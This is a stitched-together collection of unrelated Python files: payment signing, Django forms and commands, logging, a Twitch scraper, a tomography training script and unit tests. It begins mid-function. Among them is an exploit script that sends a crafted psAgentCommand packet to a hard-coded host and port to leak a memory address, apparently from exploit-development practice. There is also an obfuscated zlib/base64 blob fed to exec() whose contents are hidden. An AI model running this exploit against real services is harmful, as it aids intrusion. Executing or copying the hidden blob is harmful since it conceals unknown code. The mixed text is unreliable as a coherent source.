form_inputs['returnUrl'] = returnUrl if abandonUrl is not None: form_inputs['abandonUrl'] = abandonUrl if process_immediate is not None: form_inputs['process_immediate'] = process_immediate if ipnUrl is not None: form_inputs['ipnUrl'] = ipnUrl if collect_shipping_address is not None: form_inputs['collectShippingAddress'] = str(collect_shipping_address) signature = self.generate_signature(self.secret_key, "POST", form_inputs, self.request_url) form_inputs['signature'] = signature return form_inputs def generate_form(self, form_inputs, request_url): assert isinstance(form_inputs, dict) inputs = ['<input type="image" src="https://authorize.payments.amazon.com/pba/images/payNowButton.png" border="0" />'] for key in form_inputs.keys(): value = form_inputs[key] if value: inputs.append('<input type="hidden" name="{0}" value="{1}" />'.format(key, value)) inputs_str = "\n ".join(inputs) form_str = '<form action="{0}" method="POST">\n '.format(request_url) + inputs_str + '\n</form>\n' return form_str def verify_success_return(self, data, success_url): """ This function verifies a success return from Amazon. It queries Amazon to make sure the response was valid. :param data: all query key/values as dict (something like request.GET.urlencode()) :param success_url: url that was set as success_url while creating input form :return: Status as either "VerifyFailed" or Success """ if not self.verify_signature(data, "GET", success_url): logger.error("Validation of Amazon request failed.") return "VerifyFailed" return "Success" def prepare_params(self, action, method, params): values = {"AWSAccessKeyId": self.access_key, "SignatureMethod": "HmacSHA256", "SignatureVersion": 2, "Timestamp": datetime.utcnow().isoformat() + '-00:00', "Version": "2008-09-17", "Action": action} values.update(params) values["Signature"] = self.generate_signature(self.secret_key, method, values, self.FPS_URL) return values def execute_fps(self, action, method, **params): """ Make a request against the FPS api. 
""" values = self.prepare_params(action, method, params) url = "%s?%s" % (self.FPS_URL, urllib.urlencode(values)) request = urllib2.Request(url) try: req = urllib2.urlopen(request) response = req.read() except HTTPError, e: if e.code == 400: response = e.read() else: raise return response def verify_signature(self, raw_data, http_method, endpoint_uri): response = self.execute_fps( "VerifySignature", http_method, UrlEndPoint=endpoint_uri, HttpParameters=raw_data) xml = ET.XML(response) el = xml.find(".//{http://fps.amazonaws.com/doc/2008-09-17/}VerificationStatus") return el is not None and el.text == "Success" def refund(self, CallerDescription, CallerReference, RefundAmount_CurrencyCode, RefundAmount_Value, TransactionId): params = { "CallerDescription": CallerDescription, "CallerReference": CallerReference, "RefundAmount.CurrencyCode": RefundAmount_CurrencyCode, "RefundAmount.Value": RefundAmount_Value, "TransactionId": TransactionId } return self._do_refund(params) def _do_refund(self, params): return self.execute_fps("Refund", "GET", params) @staticmethod def generate_signature(secret_key, verb, values, request_url): """ Generate signature for call. (same signature is used for CBUI call) NOTE: Python's urlencode doesn't work for Amazon. Spaces need to be %20 and not +. This only affects the signature generation, not the key/values submitted. """ keys = values.keys() keys.sort() sorted_values = collections.OrderedDict([(k, values[k]) for k in keys]) query = urllib.urlencode(sorted_values) query = query.replace("+", "%20") parsed = urlparse.urlsplit(request_url) base = "%(verb)s\n%(hostheader)s\n%(requesturi)s\n%(query)s" % { "verb": verb.upper(), "hostheader": parsed.hostname.lower(), "requesturi": parsed.path, "query": query} s = hmac.new(secret_key, base, hashlib.sha256) return base64.encodestring(s.digest())[:-1]
from django import forms

from posts.models import Post


class PostForm(forms.ModelForm):
    """Form for creating and editing posts."""

    class Meta:
        model = Post
        fields = ["title", "text"]
        help_texts = {
            "text": "Write the text",
            "title": "Write the title",
        }


class EmailForm(forms.Form):
    subject = forms.CharField(
        label='Subject',
        widget=forms.TextInput(attrs={'class': 'form-control'}))
    content = forms.CharField(
        label='Text',
        # A Textarea is needed for the "rows" attribute to have any effect.
        widget=forms.Textarea(attrs={'class': 'form-control', "rows": 5}))
from ..remote import RemoteModel from infoblox_netmri.utils.utils import check_api_availability class NotificationRemote(RemoteModel): """ Configurable notifications on issues, etc. | ``id:`` The internal NetMRI identifier for the notification. | ``attribute type:`` number | ``auth_user_id:`` User ID of the creator. | ``attribute type:`` number | ``category:`` A category of the notification. Possible values are 'issue','change','job','systemalert'. | ``attribute type:`` string | ``delivery_method:`` Delivery method of the notification. Possible values are 'email', 'syslog', 'snmp'. | ``attribute type:`` string | ``mime:`` Message MIME type. Possible values are 'html' or 'text'. | ``attribute type:`` string | ``subject:`` Subject of the notification e-mail. | ``attribute type:`` string | ``message_template:`` Notification message template. | ``attribute type:`` string | ``details_template:`` Notification details template. | ``attribute type:`` string | ``to:`` Notification e-mail 'To:' field. | ``attribute type:`` string | ``created_at:`` The date and time the record was initially created in NetMRI. | ``attribute type:`` datetime | ``updated_at:`` The date and time the record was last modified in NetMRI. | ``attribute type:`` datetime | ``from:`` Notification e-mail 'from:' field. | ``attribute type:`` string | ``from_name:`` Name for the 'from:' field. | ``attribute type:`` string | ``severity:`` Severity level from 1 to 3. | ``attribute type:`` number | ``all_in_category_ind:`` Notify for all in the category. | ``attribute type:`` bool | ``all_device_groups_ind:`` Do not restrict notification to particular device groups. | ``attribute type:`` bool | ``all_interface_groups_ind:`` Do not restrict notification to particular interface groups. | ``attribute type:`` bool | ``time_window_id:`` Time window id. | ``attribute type:`` number | ``event_type:`` List of events that we subscribe to. Default is all events. | ``attribute type:`` string | ``send_clearing_ind:`` Whether to send a notification on issue clearing. | ``attribute type:`` bool | ``cron:`` Schedule for summary notifications in cron format. | ``attribute type:`` string | ``last_run:`` Last run. | ``attribute type:`` datetime """ properties = ("id", "auth_user_id", "category", "delivery_method", "mime", "subject", "message_template", "details_template", "to", "created_at", "updated_at", "from", "from_name", "severity", "all_in_category_ind", "all_device_groups_ind", "all_interface_groups_ind", "time_window_id", "event_type", "send_clearing_ind", "cron", "last_run", )
from django.contrib import admin from models import * class RegistrationProfileAdmin(admin.ModelAdmin): pass admin.site.register( RegistrationProfile, RegistrationProfileAdmin)
__author__ = 'btorres-gil'
#!/usr/bin/env python """ syslog client """ import argparse import logging from logging.handlers import SysLogHandler class SysLog: def __init__(self, *, instrument, level): # If you define a level with the same numeric value, it overwrites the # predefined value; the predefined name is lost. logging.addLevelName(10, '<D>') # DEBUG logging.addLevelName(20, '<I>') # INFO logging.addLevelName(30, '<W>') # WARNING logging.addLevelName(40, '<E>') # ERROR logging.addLevelName(50, '<C>') # CRITICAL root = logging.getLogger() root.setLevel(level) root.handlers = [] # syslog handler relies on syslog server to add timestamp syslog_handler = SysLogHandler('/dev/log') syslog_handler.setLevel(level) syslog_formatter = logging.Formatter(instrument + '-%(module)s[%(process)d]: %(levelname)s %(message)s') syslog_handler.setFormatter(syslog_formatter) root.addHandler(syslog_handler) # console handler applies local timestamp console_handler = logging.StreamHandler(None) console_handler.setLevel(level) console_formatter = logging.Formatter('%(asctime)s ' + instrument + '-%(module)s[%(process)d]: %(levelname)s %(message)s') console_handler.setFormatter(console_formatter) root.addHandler(console_handler) self.syslog_handler = syslog_handler self.console_handler = console_handler #for h in root.handlers : print(str(h)) # ------------------------ self-test ---------------------------- def main(): # Process arguments parser = argparse.ArgumentParser() parser.add_argument('-v', action='store_true', help='be verbose') parser.add_argument('-P', metavar='INSTRUMENT', default='TST', help='instrument_name[:station_number]') args = parser.parse_args() # choose logging level if args.v: level=logging.DEBUG else: level=logging.INFO # configure logging handlers logger = SysLog(instrument=args.P, level=level) # log test messages logging.critical('this is a test critical message') logging.error('this is a test error message') logging.warning('this is a test warning message') logging.info('this is a test info message') logging.debug('this is a test debug message') return if __name__ == '__main__': main()
import zlib, base64 exec(zlib.decompress(base64.b64decode('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'))) # Created by pyminifier (https://github.com/liftoff/pyminifier)
import sys

import polib
from django.core.management.base import BaseCommand

from tradukoj.models import Namespace


class Command(BaseCommand):
    # pylint: disable=C0301
    help = 'Show Translation Keys that are incompatible with plain tree generation'
    exitcode = 0
    data = None

    def add_arguments(self, parser):
        parser.add_argument(
            '--pofile',
            dest='pofile',
            required=False,
            help='Test a pofile instead of the database',
        )

    def handle(self, *args, **options):
        # argparse always populates the 'pofile' key (None when not given),
        # so check its value rather than its presence.
        if options.get('pofile'):
            po_file = polib.pofile(options['pofile'])
            self.data = {"test": {}}
            for entry in po_file:
                self.test_text(entry.msgid)
            self.stdout.write(self.style.SUCCESS(f"Done {options['pofile']}"))
            sys.exit(self.exitcode)

        for namespace in Namespace.objects.all():
            self.stdout.write(f"Testing {namespace}...")
            self.data = {"test": {}}
            for translationkey in namespace.translation_keys.all():
                self.test_text(translationkey.text)
            self.stdout.write(self.style.SUCCESS(f"Done {namespace} test."))
        sys.exit(self.exitcode)

    def test_text(self, translationkey):
        if not translationkey:
            return
        if not translationkey.strip():
            return
        deep = translationkey.split('.')
        _current_node = self.data['test']
        for i, element in enumerate(deep):
            if i == (len(deep) - 1):
                if not isinstance(_current_node, dict):
                    self.stdout.write(
                        f"Error: The key `{element}` in `{translationkey}` tries to be an object but there is a string on this path"
                    )
                    self.exitcode = 1
                    break
                if element in _current_node:
                    self.stdout.write(
                        f"Error: The key `{element}` in `{translationkey}` tries to be a string but there is an object on this path"
                    )
                    self.exitcode = 1
                    break
                _current_node[element] = str(translationkey)
                break
            if element not in _current_node:
                _current_node[element] = {}
            if isinstance(_current_node[element], str):
                self.stdout.write(
                    f"Error: The key `{element}` in `{translationkey}` tries to be an object but there is a string on this path"
                )
                self.exitcode = 1
                break
            _current_node = _current_node[element]
#!/usr/bin/env python3 import socket import sys from struct import pack # psAgentCommand buf = bytearray([0x41] * 0xC) buf += pack("<i", 0x2000) # opcode buf += pack("<i", 0x0) # 1st memcpy: offset buf += pack("<i", 0x100) # 1st memcpy: size field buf += pack("<i", 0x100) # 2nd memcpy: offset buf += pack("<i", 0x100) # 2nd memcpy: size field buf += pack("<i", 0x200) # 3rd memcpy: offset buf += pack("<i", 0x100) # 3rd memcpy: size field buf += bytearray([0x41] * 0x8) # psCommandBuffer symbol = b"SymbolOperationWriteProcessMemory" + b"\x00" buf += symbol + b"A" * (100 - len(symbol)) buf += b"B" * 0x100 buf += b"C" * 0x100 # Checksum buf = pack(">i", len(buf) - 4) + buf def parseResponse(response): """ Parse a server response and extract the leaked address """ pattern = b"Address is:" address = None for line in response.split(b"\n"): if line.find(pattern) != -1: address = int((line.split(pattern)[-1].strip()), 16) if not address: print("[-] Could not find the address in the Response") sys.exit() return address def main(): server = "192.168.185.10" port = 11460 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) response = s.recv(1024) address = parseResponse(response) print(hex(address)) s.close() print("[+] Packet sent") sys.exit(0) if __name__ == "__main__": main()
import numpy as np from l5kit.data import get_combined_scenes, SCENE_DTYPE def test_empty_input() -> None: # Empty scenes = np.array([], dtype=SCENE_DTYPE) combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 0 def test_trivial_input() -> None: # One scene scenes = np.zeros(1, dtype=SCENE_DTYPE) scenes[0]["host"] = "some-host" scenes[0]["start_time"] = 0 scenes[0]["end_time"] = 1000 scenes[0]["frame_index_interval"] = [0, 10] combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 1 np.testing.assert_array_equal(scenes, combined_scenes) def test_followup_scenes() -> None: num_scenes = 10 scenes = np.zeros(num_scenes, dtype=SCENE_DTYPE) for i in range(num_scenes): scenes[i]["host"] = "some-host" scenes[i]["start_time"] = i * 1000 scenes[i]["end_time"] = (i + 1) * 1000 scenes[i]["frame_index_interval"] = [i * 10, (i + 1) * 10] combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 1 combo_scene = combined_scenes[0] assert combo_scene["host"] == "some-host" assert combo_scene["start_time"] == 0 assert combo_scene["end_time"] == 10000 np.testing.assert_array_equal(combo_scene["frame_index_interval"], np.array([0, 100])) # To follow up they must be the same host scenes[1]["host"] = "some-other-host" combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 3 # And their timestamps must follow up exactly scenes[5]["start_time"] += 1 combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 4
class _PickleMessage: """ The abstract class that is the superclass for persistent messages sent from one component to another. This class has no properties or methods. Users subclass Message and add properties. The PEX framework provides the persistence to objects derived from the Message class. """ pass
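# A minimal hypothetical subclass sketch, following the docstring above: the
# subclass only declares the fields it wants the framework to persist (the
# class and field names here are illustrative, not part of the framework).
class TemperatureReading(_PickleMessage):
    """A message carrying a single sensor sample."""

    def __init__(self, sensor_id, celsius, timestamp):
        self.sensor_id = sensor_id
        self.celsius = celsius
        self.timestamp = timestamp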
try: import env except ImportError: print('No env file found when starting crawler. Using fallback methods.') pass import boto3 import json import os from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.common.keys import Keys import time # This crawler is a standalone script. It relies on the env file to get the AWS bucket and the path to the chromedriver. # If you do not have these environmental variables set, you can set them below and it will use them instead. # This crawler also requires that your AWS credentials are already set up in your environment. It will not set them up for you nor will it prompt you for them. # The workflow for this script is as follows: # 1. Download the current data from S3 # 2. Crawl Twitch for all currently live streamers marked as 'vtuber' # 3. Create a new timestamped file with the cumulative data # 4. Upload the new data to S3, overwriting previous (backups will be kept locally to conserve S3 space) # Run the crawler from the top def full_cycle(): download_from_s3() data = crawl() update_file(data) upload_to_s3() # Load Twitch directory using Selenium, then scroll through the page, scraping the data as we go def crawl(): webdriver_service = Service(os.environ.get('CHROMEDRIVER_PATH', 'path-to-your-chromedriver')) driver = webdriver.Chrome(service = webdriver_service) driver.get('https://www.twitch.tv/directory/all/tags/52d7e4cc-633d-46f5-818c-bb59102d9549') time.sleep(5) # Wait for page to load before attempting to crawl vtubers = {} # Joint storage that will be returned once new data is gathered vtuber_storage = {} # Storage for previous data from file crawl_start = time.time() with open('../Data/vtubers.json', 'r+', encoding='utf-8') as f: try: vtuber_storage = json.load(f) # Load previous data from file if it exists except json.decoder.JSONDecodeError: pass card = driver.find_element_by_xpath('//a[@data-a-target="preview-card-title-link"]') # First card DOM element while True: card.send_keys(Keys.END) # "Scroll" time.sleep(1) # Wait for page to load cards = driver.find_elements_by_xpath('//a[@data-test-selector="preview-card-avatar"]') # Break based on time rather than if we have reached the end of the page, because the page has more data than we can hope to scrape if time.time() - crawl_start > 300: break # Stop scraping past five minutes (scraping this way uses exponential resources over time) else: for card in cards: # find the vtuber's avatar image thumb = card.find_element_by_xpath('.//img') vtubers[card.get_attribute('href').split('/')[-1]] = {'twitch': {}, 'thumbnail': thumb.get_attribute('src')} # for each entry in vtubers for vtuber in vtubers: # if vtuber is not in vtuber_storage, add it to the storage if vtuber not in vtuber_storage: vtuber_storage[vtuber] = {'twitch': {}, 'thumbnail': vtubers[vtuber]['thumbnail']} # if vtuber is in vtuber_storage, only add thumbnail if it is not already there elif 'thumbnail' not in vtuber_storage[vtuber]: vtuber_storage[vtuber]['thumbnail'] = vtubers[vtuber]['thumbnail'] #vtubers = {**vtubers, **vtuber_storage} # Merge the two dictionaries, with priority given to the file data return vtuber_storage # Overwrite the cumulative data file with the new data, making a backup in the process def update_file(data): with open(f'../Data/vtubers_{time.time()}.json', 'w', encoding='utf-8') as f: # Save timestamped backup file json.dump(data, f, ensure_ascii=False, indent=4) with open('../Data/vtubers.json', 'w', encoding='utf-8') as f: # Save cumulative file 
json.dump(data, f, ensure_ascii=False, indent=4) # Upload the cumulative data to specified S3 bucket def upload_to_s3(): s3 = boto3.client('s3') with open('../Data/vtubers.json', "rb") as f: # This is hard-coded only because it is designed to overwrite itself each run s3.upload_fileobj(f, os.environ.get('S3_BUCKET', 'your_bucket_here'), os.path.basename('../Data/vtubers.json'), ExtraArgs={'ACL':'public-read'}) # Download the cumulative data from specified S3 bucket def download_from_s3(): s3 = boto3.client('s3') s3.download_file(os.environ.get('S3_BUCKET', 'your_bucket_here'), os.path.basename('../Data/vtubers.json'), '../Data/vtubers.json') while True: # Run the crawler every hour full_cycle() time.sleep(3600)
"""Partially learned gradient descent scheme for ellipses.""" import os import sys import adler #adler.util.gpu.setup_one_gpu() from adler.tensorflow import prelu, cosine_decay, reference_unet, psnr import tensorflow as tf import numpy as np import odl import odl.contrib.tensorflow def random_ellipse(interior=False): if interior: x_0 = np.random.rand() - 0.5 y_0 = np.random.rand() - 0.5 else: x_0 = 2 * np.random.rand() - 1.0 y_0 = 2 * np.random.rand() - 1.0 magnitude = np.random.choice([-1, 1]) * (0.1 + np.random.exponential(0.2)) return (magnitude, np.random.exponential() * 0.2, np.random.exponential() * 0.2, x_0, y_0, np.random.rand() * 2 * np.pi) def random_phantom(spc, n_ellipse=50, interior=False): n = np.random.poisson(n_ellipse) ellipses = [random_ellipse(interior=interior) for _ in range(n)] return odl.phantom.ellipsoid_phantom(spc, ellipses) def make_difference(space): minp = (np.random.rand(2) - 0.5) - 0.05 maxp = minp + 0.1 + 0.1 * (np.random.rand(2) - 0.5) scale = 0.5 * space.domain.extent magnitude = 0.1 return magnitude * odl.phantom.cuboid(space, scale * minp, scale * maxp) power = float(sys.argv[1]) const_val = 10 ** power print('Running with const_val={}'.format(const_val)) np.random.seed(0) name = os.path.splitext(os.path.basename(__file__))[0] + '/' + str(const_val) sess = tf.InteractiveSession() # Create ODL data structures size = 128 space = odl.uniform_discr([-64, -64], [64, 64], [size, size], dtype='float32') geometry = odl.tomo.parallel_beam_geometry(space, num_angles=30) operator = odl.tomo.RayTransform(space, geometry) # Ensure operator has fixed operator norm for scale invariance opnorm = odl.power_method_opnorm(operator) operator = (1 / opnorm) * operator # Create tensorflow layer from odl operator odl_op_layer = odl.contrib.tensorflow.as_tensorflow_layer(operator, 'RayTransform') odl_op_layer_adjoint = odl.contrib.tensorflow.as_tensorflow_layer(operator.adjoint, 'RayTransformAdjoint') # User selected paramters n_data = 5 n_iter = 10 n_primal = 5 n_dual = 5 def generate_data(validation=False): """Generate a set of random data.""" n_generate = 1 if validation else n_data y_arr1 = np.empty((n_generate, operator.range.shape[0], operator.range.shape[1], 1), dtype='float32') x_true_arr1 = np.empty((n_generate, space.shape[0], space.shape[1], 1), dtype='float32') y_arr2 = np.empty((n_generate, operator.range.shape[0], operator.range.shape[1], 1), dtype='float32') x_true_arr2 = np.empty((n_generate, space.shape[0], space.shape[1], 1), dtype='float32') for i in range(n_generate): if validation: phantom1 = odl.phantom.shepp_logan(space, True) else: phantom1 = random_phantom(space) phantom2 = phantom1 + make_difference(space) data1 = operator(phantom1) noisy_data1 = data1 + odl.phantom.white_noise(operator.range) * np.mean(np.abs(data1)) * 0.05 data2 = operator(phantom2) noisy_data2 = data2 + odl.phantom.white_noise(operator.range) * np.mean(np.abs(data2)) * 0.05 x_true_arr1[i, ..., 0] = phantom1 y_arr1[i, ..., 0] = noisy_data1 x_true_arr2[i, ..., 0] = phantom2 y_arr2[i, ..., 0] = noisy_data2 return y_arr1, x_true_arr1, y_arr2, x_true_arr2 with tf.name_scope('placeholders'): x_true1 = tf.placeholder(tf.float32, shape=[None, size, size, 1], name="x_true1") y_rt1 = tf.placeholder(tf.float32, shape=[None, operator.range.shape[0], operator.range.shape[1], 1], name="y_rt1") x_true2 = tf.placeholder(tf.float32, shape=[None, size, size, 1], name="x_true2") y_rt2 = tf.placeholder(tf.float32, shape=[None, operator.range.shape[0], operator.range.shape[1], 1], name="y_rt2") 
is_training = tf.placeholder(tf.bool, shape=(), name='is_training') const = tf.placeholder(tf.float32, shape=(), name='const') def apply_conv(x, filters=32): return tf.layers.conv2d(x, filters=filters, kernel_size=3, padding='SAME', kernel_initializer=tf.contrib.layers.xavier_initializer()) def learned_primal_dual(data, reuse): with tf.variable_scope('learned_primal_dual', reuse=reuse): with tf.name_scope('initial_values'): primal = tf.concat([tf.zeros_like(x_true1)] * n_primal, axis=-1) dual = tf.concat([tf.zeros_like(data)] * n_dual, axis=-1) for i in range(n_iter): with tf.variable_scope('dual_iterate_{}'.format(i)): evalop = odl_op_layer(primal[..., 1:2]) update = tf.concat([dual, evalop, data], axis=-1) update = prelu(apply_conv(update), name='prelu_1') update = prelu(apply_conv(update), name='prelu_2') update = apply_conv(update, filters=n_dual) dual = dual + update with tf.variable_scope('primal_iterate_{}'.format(i)): evalop = odl_op_layer_adjoint(dual[..., 0:1]) update = tf.concat([primal, evalop], axis=-1) update = prelu(apply_conv(update), name='prelu_1') update = prelu(apply_conv(update), name='prelu_2') update = apply_conv(update, filters=n_primal) primal = primal + update return primal[..., 0:1] with tf.name_scope('tomography'): recon1 = learned_primal_dual(y_rt1, reuse=False) recon2 = learned_primal_dual(y_rt2, reuse=True) with tf.name_scope('edge_detect'): recons = tf.concat([recon1, recon2], axis=-1) difference_update = reference_unet(recons, 1, ndim=2, features=64, keep_prob=1.0, use_batch_norm=False, activation='relu', is_training=is_training, name='edge_result') difference_result = (recon1 - recon2) + difference_update with tf.name_scope('loss'): loss_tomography = (tf.reduce_mean((recon1 - x_true1) ** 2) + tf.reduce_mean((recon2 - x_true2) ** 2)) loss_difference = tf.reduce_mean((difference_result - (x_true1 - x_true2)) ** 2) loss = loss_tomography + const * loss_difference with tf.name_scope('optimizer'): # Learning rate global_step = tf.Variable(0, trainable=False) maximum_steps = 100001 starter_learning_rate = 3e-4 learning_rate = cosine_decay(starter_learning_rate, global_step, maximum_steps, name='learning_rate') update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): opt_func = tf.train.AdamOptimizer(learning_rate=learning_rate, beta2=0.99) tvars = tf.trainable_variables() grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), 1) optimizer = opt_func.apply_gradients(zip(grads, tvars), global_step=global_step) # Summaries # tensorboard --logdir=... 
with tf.name_scope('summaries'): tf.summary.scalar('loss', loss) tf.summary.scalar('loss_tomography', loss_tomography) tf.summary.scalar('loss_difference', loss_difference) tf.summary.scalar('psnr1', psnr(recon1, x_true1)) tf.summary.scalar('psnr2', psnr(recon2, x_true2)) tf.summary.image('recon1', recon1) tf.summary.image('recon2', recon2) tf.summary.image('x_true1', x_true1) tf.summary.image('x_true2', x_true2) tf.summary.image('difference', difference_result) tf.summary.image('difference_true', (x_true1 - x_true2)) merged_summary = tf.summary.merge_all() test_summary_writer, train_summary_writer = adler.tensorflow.util.summary_writers(name, cleanup=True) # Initialize all TF variables sess.run(tf.global_variables_initializer()) # Add op to save and restore saver = tf.train.Saver() # Generate validation data y_arr_validate1, x_true_arr_validate1, y_arr_validate2, x_true_arr_validate2 = generate_data(validation=True) if 0: saver.restore(sess, adler.tensorflow.util.default_checkpoint_path(name)) # Train the network for i in range(0, maximum_steps): if i%10 == 0: y_arr1, x_true_arr1, y_arr2, x_true_arr2 = generate_data() _, merged_summary_result_train, global_step_result = sess.run([optimizer, merged_summary, global_step], feed_dict={x_true1: x_true_arr1, y_rt1: y_arr1, x_true2: x_true_arr2, y_rt2: y_arr2, is_training: True, const: const_val}) if i>0 and i%10 == 0: loss_result, merged_summary_result, global_step_result = sess.run([loss, merged_summary, global_step], feed_dict={x_true1: x_true_arr_validate1, y_rt1: y_arr_validate1, x_true2: x_true_arr_validate2, y_rt2: y_arr_validate2, is_training: False, const: const_val}) train_summary_writer.add_summary(merged_summary_result_train, global_step_result) test_summary_writer.add_summary(merged_summary_result, global_step_result) print('iter={}, loss={}'.format(global_step_result, loss_result)) if i>0 and i%1000 == 0: saver.save(sess, adler.tensorflow.util.default_checkpoint_path(name))
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cloudferry.lib.utils import remote_runner def has_ssh_connectivity(connection_user, user, key, src_host, dst_host): """:returns: True if `user@src_host` can ssh into `dst_host` with `key`""" rr = remote_runner.RemoteRunner(src_host, connection_user, timeout=5) try: ssh = ("ssh -i {key} " "-o StrictHostKeyChecking=no " "-o UserKnownHostsFile=/dev/null " "{user}@{dst_host} 'echo'") rr.run(ssh.format(key=key, user=user, dst_host=dst_host)) return True except remote_runner.RemoteExecutionError: return False
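# Hypothetical call of the helper above; the hosts, user names and key path
# are placeholders. It answers: can `user` on src_host reach dst_host with
# the given key, when we connect to src_host as connection_user?
if has_ssh_connectivity(connection_user="cloud",
                        user="migration",
                        key="/home/migration/.ssh/id_rsa",
                        src_host="192.0.2.10",
                        dst_host="192.0.2.20"):
    print("key-based ssh from the source host to the destination host works")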
import unittest

from incometax.contributions import SSSContribution, PagIBIGContribution, PhilHealthContribution


class TestSSSContribution(unittest.TestCase):

    def test_lowest_contribution(self):
        c = SSSContribution(2000)
        self.assertEqual(c.monthly_contribution, 80)

    def test_other_contribution(self):
        c = SSSContribution(8251)
        self.assertEqual(c.monthly_contribution, 340)

    def test_largest_contribution(self):
        c = SSSContribution(20000)
        self.assertEqual(c.monthly_contribution, 800)


class TestPhilHealthContribution(unittest.TestCase):

    def test_value_error_for_invalid_membership(self):
        self.assertRaises(ValueError, PhilHealthContribution, 200, 'test')

    def test_contribution_value_employed(self):
        self.assertEqual(
            PhilHealthContribution(9000).monthly_contribution, 137.50
        )
        self.assertEqual(
            PhilHealthContribution(11000).monthly_contribution, (11000 * 0.0275) / 2
        )
